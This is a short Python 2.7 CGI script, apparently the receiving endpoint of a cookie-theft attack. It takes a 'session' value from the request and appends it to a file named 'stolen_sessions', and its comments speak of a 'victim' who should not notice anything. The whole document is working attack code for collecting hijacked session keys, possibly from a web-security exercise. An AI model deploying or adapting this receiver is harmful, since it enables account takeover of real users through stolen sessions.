#!/usr/bin/env python2.7 import Cookie, os, time import re import uuid import cgi import cgitb from output import * cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser cookie = Cookie.SimpleCookie() # for writing cookies form = cgi.FieldStorage() # for reading GET data session = form.getvalue('session') if session: with open('stolen_sessions','a') as m: m.write(session + '\n') #Send victim to homepage so they don't notice anything! print 'Content-Type: text/html\n' print '
We got your session key
' exit(0)